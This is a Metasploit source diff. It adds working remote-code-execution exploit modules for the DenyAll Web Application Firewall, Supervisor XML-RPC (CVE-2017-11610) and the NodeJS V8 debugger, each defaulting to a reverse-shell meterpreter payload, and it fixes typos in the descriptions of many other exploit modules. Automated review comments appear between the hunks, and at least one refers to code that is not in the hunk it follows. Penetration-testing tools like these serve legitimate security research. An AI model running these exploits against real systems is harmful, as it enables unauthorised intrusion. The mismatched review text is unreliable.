end +end diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 11686cd943..474caddd27 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -124,11 +124,15 @@ class MetasploitModule < Msf::Auxiliary ) end - rescue ::Rex::ConnectionError + rescue ::Rex::ConnectionError, ::Errno::ECONNRESET => e + print_error("A network issue has occurred: #{e.message}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue Timeout::Error print_error("#{target_host}:#{rport} Timed out after #{to} seconds") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") rescue ::Exception => e print_error("#{target_host}:#{rport} Error: #{e} #{e.backtrace}") + elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") ensure disconnect end diff --git a/modules/exploits/linux/http/denyall_waf_exec.rb b/modules/exploits/linux/http/denyall_waf_exec.rb new file mode 100644 index 0000000000..469144d3d6 --- /dev/null +++ b/modules/exploits/linux/http/denyall_waf_exec.rb 
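Review bot: `rescue ::Exception => e` in `run_host` also catches Interrupt and SystemExit, so a user aborting a scan mid-host is reported as a module error instead of stopping; `rescue ::StandardError => e` is the intended breadth here, and the three bare `rescue` clauses above it could be merged into one line for readability. The comment `# Only accept NT LM 0.12 dialect and WfW3.0` no longer matches the six-entry `dialects` list sent on the wire; rewrite it to describe what is actually offered, e.g. `# Offer the classic SMB1 dialect set; an 0xFF SMB header in the reply means SMBv1 is spoken`. The `report_note` uses `type: "supports SMB 1"` while `sname:` is `'smb1'`; a consistent token makes the note easier to query later.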
@@ -0,0 +1,103 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "DenyAll Web Application Firewall Remote Code Execution", + 'Description' => %q{ + This module exploits the command injection vulnerability of DenyAll Web Application Firewall. Unauthenticated users can execute a + terminal command under the context of the web server user. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mehmet Ince ' # author & msf module + ], + 'References' => + [ + ['URL', 'https://pentest.blog/advisory-denyall-web-application-firewall-unauthenticated-remote-code-execution/'] + ], + 'DefaultOptions' => + { + 'SSL' => true, + 'RPORT' => 3001, + 'Payload' => 'python/meterpreter/reverse_tcp' + }, + 'Platform' => ['python'], + 'Arch' => ARCH_PYTHON, + 'Targets' => [[ 'Automatic', { }]], + 'Privileged' => false, + 'DisclosureDate' => "Sep 19 2017", + 'DefaultTarget' => 0 + )) + + register_options( + [ + OptString.new('TARGETURI', [true, 'The URI of the vulnerable DenyAll WAF', '/']) + ] + ) + end + + def get_token + # Taking token by exploiting bug on first endpoint. + res = send_request_cgi({ + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'download', 'index.php'), + 'vars_get' => { + 'applianceUid' => 'LOCALUID', + 'typeOf' => 'debug' + } + }) + + if res && res.code == 200 && res.body.include?("iToken") + res.body.scan(/"iToken";s:32:"([a-z][a-f0-9]{31})";/).flatten[0] + else + nil + end + end + + def check + # If we've managed to get token, that means target is most likely vulnerable. + token = get_token + if token.nil? 
+ Exploit::CheckCode::Safe + else + Exploit::CheckCode::Appears + end + end + + def exploit + # Get iToken from unauthenticated accessible endpoint + print_status('Extracting iToken value') + token = get_token + + if token.nil? + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Awesome. iToken value = #{token}") + end + + # Accessing to the vulnerable second endpoint where we have command injection with valid iToken + print_status('Trigerring command injection vulnerability with iToken value.') + r = rand_text_alpha(5 + rand(3)); + + send_request_cgi({ + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'webservices', 'stream', 'tail.php'), + 'vars_post' => { + 'iToken' => token, + 'tag' => 'tunnel', + 'stime' => r, + 'type' => "#{r}$(python -c \"#{payload.encoded}\")" + } + }) + + end +end diff --git a/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb new file mode 100644 index 0000000000..3f28f6f321 --- /dev/null +++ b/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb 
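Review bot: `check` reports `Exploit::CheckCode::Safe` whenever `get_token` returns nil, but `get_token` returns nil both when a 200 response lacks the token and when `res` is nil or a non-200 status, so a closed port or timeout is reported as "safe" rather than "unknown". Have `get_token` return nil only for a 200 body without the token and let `check` return `Exploit::CheckCode::Unknown` when no usable response came back. Minor style: `r = rand_text_alpha(5 + rand(3));` carries a stray semicolon, and the `else nil` in `get_token` is redundant since a failed `if` already yields nil.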
@@ -0,0 +1,169 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info={}) + super(update_info(info, + 'Name' => "Supervisor XML-RPC Authenticated Remote Code Execution", + 'Description' => %q{ + This module exploits a vulnerability in the Supervisor process control software, where an authenticated client + can send a malicious XML-RPC request to supervisord that will run arbitrary shell commands on the server. + The commands will be run as the same user as supervisord. Depending on how supervisord has been configured, this + may be root. This vulnerability can only be exploited by an authenticated client, or if supervisord has been + configured to run an HTTP server without authentication. This vulnerability affects versions 3.0a1 to 3.3.2. 
+ }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Calum Hutton ' + ], + 'References' => + [ + ['URL', 'https://github.com/Supervisor/supervisor/issues/964'], + ['URL', 'https://www.debian.org/security/2017/dsa-3942'], + ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11610'], + ['URL', 'https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610'], + ['CVE', '2017-11610'] + ], + 'Platform' => 'linux', + 'Targets' => + [ + ['3.0a1-3.3.2', {}] + ], + 'Arch' => [ ARCH_X86, ARCH_X64 ], + 'DefaultOptions' => + { + 'RPORT' => 9001, + 'Payload' => 'linux/x64/meterpreter/reverse_tcp', + }, + 'Privileged' => false, + 'DisclosureDate' => 'Jul 19 2017', + 'DefaultTarget' => 0 + )) + + register_options( + [ + Opt::RPORT(9001), + OptString.new('HttpUsername', [false, 'Username for HTTP basic auth']), + OptString.new('HttpPassword', [false, 'Password for HTTP basic auth']), + OptString.new('TARGETURI', [true, 'The path to the XML-RPC endpoint', '/RPC2']), + ] + ) + end + + def check_version(version) + if version <= Gem::Version.new('3.3.2') and version >= Gem::Version.new('3.0a1') + return true + else + return false + end + end + + def check + + print_status('Extracting version from web interface..') + + params = { + 'method' => 'GET', + 'uri' => normalize_uri('/') + } + if !datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? 
+ print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + res = send_request_cgi(params) + + if res + if res.code == 200 + match = res.body.match(/(\d+\.[\dab]\.\d+)<\/span>/) + if match + version = Gem::Version.new(match[1]) + if check_version(version) + print_good("Vulnerable version found: #{version}") + return Exploit::CheckCode::Appears + else + print_bad("Version #{version} is not vulnerable") + return Exploit::CheckCode::Safe + end + else + print_bad('Could not extract version number from web interface') + return Exploit::CheckCode::Unknown + end + elsif res.code == 401 + print_bad("Authentication failed: #{res.code} response") + return Exploit::CheckCode::Safe + else + print_bad("Unexpected HTTP code: #{res.code} response") + return Exploit::CheckCode::Unknown + end + else + print_bad('Error connecting to web interface') + return Exploit::CheckCode::Unknown + end + + end + + def execute_command(cmd, opts = {}) + + # XML-RPC payload template, use nohup and & to detach and background the process so it doesnt hangup the web server + # Credit to the following urls for the os.system() payload + # https://github.com/phith0n/vulhub/tree/master/supervisor/CVE-2017-11610 + # https://www.leavesongs.com/PENETRATION/supervisord-RCE-CVE-2017-11610.html + xml_payload = %{ + + supervisor.supervisord.options.warnings.linecache.os.system + + + echo -n #{Rex::Text.encode_base64(cmd)}|base64 -d|nohup bash > /dev/null 2>&1 & + + +} + + # Send the XML-RPC payload via POST to the specified endpoint + endpoint_path = target_uri.path + print_status("Sending XML-RPC payload via POST to #{peer}#{datastore['TARGETURI']}") + + params = { + 'method' => 'POST', + 'uri' => normalize_uri(endpoint_path), + 'ctype' => 'text/xml', + 'headers' => {'Accept' => 'text/xml'}, + 'data' => xml_payload, + 'encode_params' => false + } + if 
!datastore['HttpUsername'].to_s.empty? and !datastore['HttpPassword'].to_s.empty? + print_status("Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})") + params.merge!({'authorization' => basic_auth(datastore['HttpUsername'], datastore['HttpPassword'])}) + end + return send_request_cgi(params, timeout=5) + + end + + def exploit + + res = execute_cmdstager(:linemax => 800) + + if res + if res.code == 401 + fail_with(Failure::NoAccess, "Authentication failed: #{res.code} response") + elsif res.code == 404 + fail_with(Failure::NotFound, "Invalid XML-RPC endpoint: #{res.code} response") + else + fail_with(Failure::UnexpectedReply, "Unexpected HTTP code: #{res.code} response") + end + else + print_good('Request returned without status code, usually indicates success. Passing to handler..') + handler + end + + end + +end diff --git a/modules/exploits/multi/misc/nodejs_v8_debugger.rb b/modules/exploits/multi/misc/nodejs_v8_debugger.rb new file mode 100644 index 0000000000..ac1e5b4573 --- /dev/null +++ b/modules/exploits/multi/misc/nodejs_v8_debugger.rb 
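Review bot: `send_request_cgi(params, timeout=5)` does not pass a named argument; it assigns a throwaway local and passes 5 positionally, so write `send_request_cgi(params, 5)` (and the explicit `return` is unnecessary). `check_version` uses `and` between comparisons, which has lower precedence than `=` and is the idiom reviewers flag; `Gem::Version.new('3.0a1') <= version && version <= Gem::Version.new('3.3.2')` reads as the range it is. Both `check` and `execute_command` print `Using basic auth (#{datastore['HttpUsername']}:#{datastore['HttpPassword']})`, echoing the password into console output and logs; print only the username, and consider extracting the duplicated basic-auth setup into a small helper.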
@@ -0,0 +1,90 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::Tcp + + MESSAGE_HEADER_TEMPLATE = "Content-Length: %{length}\r\n\r\n" + + def initialize(info={}) + super(update_info(info, + 'Name' => "NodeJS Debugger Command Injection", + 'Description' => %q{ + This module uses the "evaluate" request type of the NodeJS V8 + debugger protocol (version 1) to evaluate arbitrary JS and + call out to other system commands. The port (default 5858) is + not exposed non-locally in default configurations, but may be + exposed either intentionally or via misconfiguration. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Patrick Thomas ' ], + 'References' => + [ + [ 'URL', 'https://github.com/buggerjs/bugger-v8-client/blob/master/PROTOCOL.md' ], + [ 'URL', 'https://github.com/nodejs/node/pull/8106' ] + ], + 'Targets' => + [ + ['NodeJS', { 'Platform' => 'nodejs', 'Arch' => 'nodejs' } ], + ], + 'Privileged' => false, + 'DisclosureDate' => "Aug 15 2016", + 'DefaultTarget' => 0) + ) + + register_options( + [ + Opt::RPORT(5858) + ]) + end + + def make_eval_message + msg_body = { seq: 1, + type: 'request', + command: 'evaluate', + arguments: { expression: payload.encoded, + global: true, + maxStringLength:-1 + } + }.to_json + msg_header = MESSAGE_HEADER_TEMPLATE % {:length => msg_body.length} + msg_header + msg_body + end + + def check + connect + res = sock.get_once + disconnect + + if res.include? "V8-Version" and res.include? 
"Protocol-Version: 1" + vprint_status("Got debugger handshake:\n#{res}") + return Exploit::CheckCode::Appears + end + + Exploit::CheckCode::Unknown + end + + def exploit + connect + # must consume incoming handshake before sending payload + buf = sock.get_once + msg = make_eval_message + print_status("Sending #{msg.length} byte payload...") + vprint_status("#{msg}") + sock.put(msg) + buf = sock.get_once + + if buf.include? '"command":"evaluate","success":true' + print_status("Got success response") + elsif buf.include? '"command":"evaluate","success":false' + print_error("Got failure response: #{buf}") + else + print_error("Got unexpected response: #{buf}") + end + end + +end diff --git a/modules/exploits/windows/browser/safari_xslt_output.rb b/modules/exploits/windows/browser/safari_xslt_output.rb index 83a3be2b05..47e00c37e7 100644 --- a/modules/exploits/windows/browser/safari_xslt_output.rb +++ b/modules/exploits/windows/browser/safari_xslt_output.rb @@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote rendering engine. It is possible to redirect the output of a XSLT transformation to an arbitrary file. The content of the created file must be ASCII or UTF-8. The destination path can be relative or absolute. This module - has been tested on Safari and Maxthon. Code execution can be acheived by first + has been tested on Safari and Maxthon. Code execution can be achieved by first uploading the payload to the remote machine in VBS format, and then upload a MOF file, which enables Windows Management Instrumentation service to execute the VBS. }, diff --git a/modules/exploits/windows/browser/teechart_pro.rb b/modules/exploits/windows/browser/teechart_pro.rb index aac0992ff7..fd67c1afa1 100644 --- a/modules/exploits/windows/browser/teechart_pro.rb +++ b/modules/exploits/windows/browser/teechart_pro.rb 
@@ -12,9 +12,9 @@ class MetasploitModule < Msf::Exploit::Remote super( update_info(info, 'Name' => 'TeeChart Professional ActiveX Control Trusted Integer Dereference', 'Description' => %q{ - This module exploits a integer overflow in TeeChart Pro ActiveX control. When + This module exploits an integer overflow in TeeChart Pro ActiveX control. When sending an overly large/negative integer value to the AddSeries() property of - TeeChart2010.ocx, the code will perform an arithemetic operation that wraps the + TeeChart2010.ocx, the code will perform an arithmetic operation that wraps the value and is later directly trusted and called upon. This module has been designed to bypass DEP only under IE8 with Java support. Multiple diff --git a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb index c8acda7aa9..8dbb835630 100644 --- a/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb +++ b/modules/exploits/windows/browser/tom_sawyer_tsgetx71ex552.rb @@ -27,7 +27,7 @@ class MetasploitModule < Msf::Exploit::Remote ActiveX control installed with Tom Sawyer GET Extension Factory due to an incorrect initialization under Internet Explorer. - While the Tom Sawyer GET Extension Factory is installed with some versions of VMware + While the Tom Sawyer GET Extension Factory is installed with some versions of VMware Infrastructure Client, this module has been tested only with the versions installed with Embarcadero Technologies ER/Studio XE2 / Embarcadero Studio Portal 1.6. The ActiveX control tested is tsgetx71ex553.dll, version 5.5.3.238. diff --git a/modules/exploits/windows/browser/webex_ucf_newobject.rb b/modules/exploits/windows/browser/webex_ucf_newobject.rb index 16b9b36426..74fb2ee7ef 100644 --- a/modules/exploits/windows/browser/webex_ucf_newobject.rb +++ b/modules/exploits/windows/browser/webex_ucf_newobject.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow', 'Description' => %q{ This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject - ActiveX Control. If an long string is passed to the 'NewObject' method, a stack- + ActiveX Control. If a long string is passed to the 'NewObject' method, a stack- based buffer overflow will occur when copying attacker-supplied data using the sprintf function. diff --git a/modules/exploits/windows/browser/winamp_playlist_unc.rb b/modules/exploits/windows/browser/winamp_playlist_unc.rb index d3496d898d..4efaa2d865 100644 --- a/modules/exploits/windows/browser/winamp_playlist_unc.rb +++ b/modules/exploits/windows/browser/winamp_playlist_unc.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Winamp Playlist UNC Path Computer Name Overflow', 'Description' => %q{ This module exploits a vulnerability in the Winamp media player. - This flaw is triggered when a audio file path is specified, inside a + This flaw is triggered when an audio file path is specified, inside a playlist, that consists of a UNC path with a long computer name. This module delivers the playlist via the browser. This module has only been successfully tested on Winamp 5.11 and 5.12. diff --git a/modules/exploits/windows/browser/winamp_ultravox.rb b/modules/exploits/windows/browser/winamp_ultravox.rb index b556a58675..e823d18b73 100644 --- a/modules/exploits/windows/browser/winamp_ultravox.rb +++ b/modules/exploits/windows/browser/winamp_ultravox.rb 
@@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack buffer overflow in Winamp 5.24. By sending an overly long artist tag, a remote attacker may be able to execute arbitrary code. This vulnerability can be - exploited from the browser or the winamp client itself. + exploited from the browser or the Winamp client itself. }, 'Author' => 'MC', 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/windvd7_applicationtype.rb b/modules/exploits/windows/browser/windvd7_applicationtype.rb index be93a9c190..f17e6e490b 100644 --- a/modules/exploits/windows/browser/windvd7_applicationtype.rb +++ b/modules/exploits/windows/browser/windvd7_applicationtype.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX - control in InterVideo WinDVD 7. By sending a overly long string + control in InterVideo WinDVD 7. By sending an overly long string to the "ApplicationType()" property, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/wmi_admintools.rb b/modules/exploits/windows/browser/wmi_admintools.rb index 0b884daf6c..b69c9f884d 100644 --- a/modules/exploits/windows/browser/wmi_admintools.rb +++ b/modules/exploits/windows/browser/wmi_admintools.rb @@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote opt-in to ASLR. As such, this module should be reliable on all Windows versions. - The WMI Adminsitrative Tools are a standalone download & install (linked in the + The WMI Administrative Tools are a standalone download & install (linked in the references). }, diff --git a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb index 21d8c4da32..83de2ea8fa 100644 
--- a/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb +++ b/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => "X360 VideoPlayer ActiveX Control Buffer Overflow", 'Description' => %q{ This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the - X360 Software. By setting an overly long value to 'ConvertFile()',an attacker can overrun + X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun a .data buffer to bypass ASLR/DEP and finally execute arbitrary code. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb index 25b3d6da7b..dacbde4f95 100644 --- a/modules/exploits/windows/browser/yahoomessenger_fvcom.rb +++ b/modules/exploits/windows/browser/yahoomessenger_fvcom.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX - Control (YVerInfo.dll <= 2006.8.24.1). By sending a overly long string + Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string to the "fvCom()" method from a yahoo.com domain, an attacker may be able to execute arbitrary code. }, diff --git a/modules/exploits/windows/browser/yahoomessenger_server.rb b/modules/exploits/windows/browser/yahoomessenger_server.rb index 69a61dcbd4..f4f5de1970 100644 --- a/modules/exploits/windows/browser/yahoomessenger_server.rb +++ b/modules/exploits/windows/browser/yahoomessenger_server.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249. - By sending a overly long string to the "Server()" method, and then calling + By sending an overly long string to the "Server()" method, and then calling the "Send()" method, an attacker may be able to execute arbitrary code. Using the payloads "windows/shell_bind_tcp" and "windows/shell_reverse_tcp" yield for the best results. diff --git a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb index b83e93a2a8..82bbcc2541 100644 --- a/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb +++ b/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb @@ -24,9 +24,9 @@ class MetasploitModule < Msf::Exploit::Remote streams with certain MAPI attachment properties, it is possible to set a path name to files to be executed. When a user double clicks on such an attachment or message, Outlook will proceed to execute the file that is set by the path name value. These - files can be local files, but also file stored remotely for example on a file share. - Exploitation is limited by the fact that its is not possible for attackers to supply - command line options. + files can be local files, but also files stored remotely (on a file share, for example) + can be used. Exploitation is limited by the fact that it is not possible for attackers + to supply command line options. }, 'Author' => 'Yorick Koster ', 'References' => diff --git a/modules/exploits/windows/fileformat/abbs_amp_lst.rb b/modules/exploits/windows/fileformat/abbs_amp_lst.rb index 49b79010d8..1fa5321339 100644 --- a/modules/exploits/windows/fileformat/abbs_amp_lst.rb +++ b/modules/exploits/windows/fileformat/abbs_amp_lst.rb 
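Review bot: The rewritten ms10_045_outlook_ref_only description still reads awkwardly on its new side: "files can be local files, but also files stored remotely (on a file share, for example) can be used" carries two verbs for one subject. A cleaner form that keeps the same meaning is `These files can be local files or files stored remotely (on a file share, for example).`, followed by the unchanged "Exploitation is limited..." sentence. The 'Description' string starts and ends outside the hunk.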
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges - of the user running the application . This module has been tested successfully on + of the user running the application. This module has been tested successfully on ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb index 80a28ed8a2..643d6b5656 100644 --- a/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb +++ b/modules/exploits/windows/fileformat/adobe_flashplayer_button.rb @@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various - Windows versions due a the hardcoded syscall number. + Windows versions due to a hardcoded syscall number. }, 'License' => MSF_LICENSE, 'Author' => diff --git a/modules/exploits/windows/fileformat/adobe_toolbutton.rb b/modules/exploits/windows/fileformat/adobe_toolbutton.rb index f5ecab3566..b411f7b954 100644 --- a/modules/exploits/windows/fileformat/adobe_toolbutton.rb +++ b/modules/exploits/windows/fileformat/adobe_toolbutton.rb 
@@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Adobe Reader ToolButton Use After Free', 'Description' => %q{ - This module exploits an use after free condition on Adobe Reader versions 11.0.2, 10.1.6 + This module exploits a use after free condition on Adobe Reader versions 11.0.2, 10.1.6 and 9.5.4 and prior. The vulnerability exists while handling the ToolButton object, where the cEnable callback can be used to early free the object memory. Later use of the object allows triggering the use after free condition. This module has been tested successfully diff --git a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb index 1298adb9f4..c2f2504e2a 100644 --- a/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb +++ b/modules/exploits/windows/fileformat/apple_quicktime_rdrf.rb @@ -13,8 +13,8 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => "Apple Quicktime 7 Invalid Atom Length Buffer Overflow", 'Description' => %q{ - This module exploits a vulnerability found in Apple Quicktime. The flaw is - triggered when Quicktime fails to properly handle the data length for certain + This module exploits a vulnerability found in Apple QuickTime. The flaw is + triggered when QuickTime fails to properly handle the data length for certain atoms such as 'rdrf' or 'dref' in the Alis record, which may result a buffer overflow by loading a specially crafted .mov file, and allows arbitrary code execution under the context of the current user. Please note: Since an egghunter diff --git a/modules/exploits/windows/fileformat/audiotran_pls.rb b/modules/exploits/windows/fileformat/audiotran_pls.rb index bf1e3297e4..7e03983186 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls.rb 
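Review bot: The apple_quicktime_rdrf hunk corrects the product name but leaves the grammatical slip on the very next context line, "which may result a buffer overflow by loading a specially crafted .mov file". Since this commit is a typo sweep of module descriptions, that line should become `atoms such as 'rdrf' or 'dref' in the Alis record, which may result in a buffer` so the description is fixed in one pass. The 'Description' string continues past the end of the hunk.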
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Audiotran 1.4.1. An attacker must send the file to victim and the victim must open the file. Alternatively it may be possible to execute code remotely via an embedded - PLS file within a browser, when the PLS extention is registered to Audiotran. + PLS file within a browser, when the PLS extension is registered to Audiotran. This functionality has not been tested in this module. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb index 597b63d501..2fca6c6c67 100644 --- a/modules/exploits/windows/fileformat/audiotran_pls_1424.rb +++ b/modules/exploits/windows/fileformat/audiotran_pls_1424.rb @@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack-based buffer overflow in Audiotran 1.4.2.4. An attacker must send the file to victim and the victim must open the file. Alternatively, it may be possible to execute code remotely via an embedded - PLS file within a browser when the PLS extention is registered to Audiotran. + PLS file within a browser when the PLS extension is registered to Audiotran. This alternate vector has not been tested and cannot be exercised directly with this module. }, diff --git a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb index c5c522c35b..7d466420ce 100644 --- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb +++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb 
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Description' => %q{ This module exploits a vulnerability found in Aviosoft Digital TV Player Pro version 1.x. An overflow occurs when the process copies the content of a - playlist file on to the stack, which may result aribitrary code execution under + playlist file on to the stack, which may result arbitrary code execution under the context of the user. }, 'License' => MSF_LICENSE, diff --git a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb index d77b63f7a7..bc24157d7b 100644 --- a/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb +++ b/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb @@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit 'Name' => "Beetel Connection Manager NetConfig.ini Buffer Overflow", 'Description' => %q{ This module exploits a stack-based buffer overflow on Beetel Connection Manager. The - vulnerability exists in the parising of the UserName parameter in the NetConfig.ini + vulnerability exists in the parsing of the UserName parameter in the NetConfig.ini file. The module has been tested successfully on PCW_BTLINDV1.0.0B04 over Windows XP SP3 and Windows 7 SP1. }, diff --git a/modules/exploits/windows/fileformat/ca_cab.rb b/modules/exploits/windows/fileformat/ca_cab.rb index 86a0680b7f..f4df94d914 100644 --- a/modules/exploits/windows/fileformat/ca_cab.rb +++ b/modules/exploits/windows/fileformat/ca_cab.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote 'Name' => 'CA Antivirus Engine CAB Buffer Overflow', 'Description' => %q{ This module exploits a stack buffer overflow in CA eTrust Antivirus 8.1.637. - By creating a specially crafted CAB file, an an attacker may be able + By creating a specially crafted CAB file, an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 
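Review bot: The aviosoft_plf_buf fix only swaps "aribitrary" for "arbitrary" and leaves "which may result arbitrary code execution under" ungrammatical on the new side. The dvdx_plf_bof hunk further down in this same commit makes the complete correction for the identical phrase ("results in arbitrary code execution"), so for consistency this line should read `playlist file on to the stack, which may result in arbitrary code execution under`.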
diff --git a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb index e6e068b02b..f9c0f711cd 100644 --- a/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb +++ b/modules/exploits/windows/fileformat/ccmplayer_m3u_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a stack based buffer overflow in CCMPlayer 1.5. Opening a m3u playlist with a long track name, a SEH exception record can be overwritten with parts of the controllable buffer. SEH execution is triggered after an - invalid read of an injectible address, thus allowing arbitrary code execution. + invalid read of an injectable address, thus allowing arbitrary code execution. This module works on multiple Windows platforms including: Windows XP SP3, Windows Vista, and Windows 7. }, diff --git a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb index c81f162437..2ce52112f9 100644 --- a/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb +++ b/modules/exploits/windows/fileformat/chasys_draw_ies_bmp_bof.rb @@ -15,7 +15,7 @@ class MetasploitModule < Msf::Exploit::Remote This module exploits a buffer overflow vulnerability found in Chasys Draw IES (version 4.10.01). The vulnerability exists in the module flt_BMP.dll, while parsing BMP files, where the ReadFile function is used to store user provided data - on the stack in a insecure way. It results in arbitrary code execution under the + on the stack in an insecure way. It results in arbitrary code execution under the context of the user viewing a specially crafted BMP file. This module has been tested successfully with Chasys Draw IES 4.10.01 on Windows XP SP3 and Windows 7 SP1. diff --git a/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb b/modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb index 2ec583c7b7..cb33d3ef1d 100644 
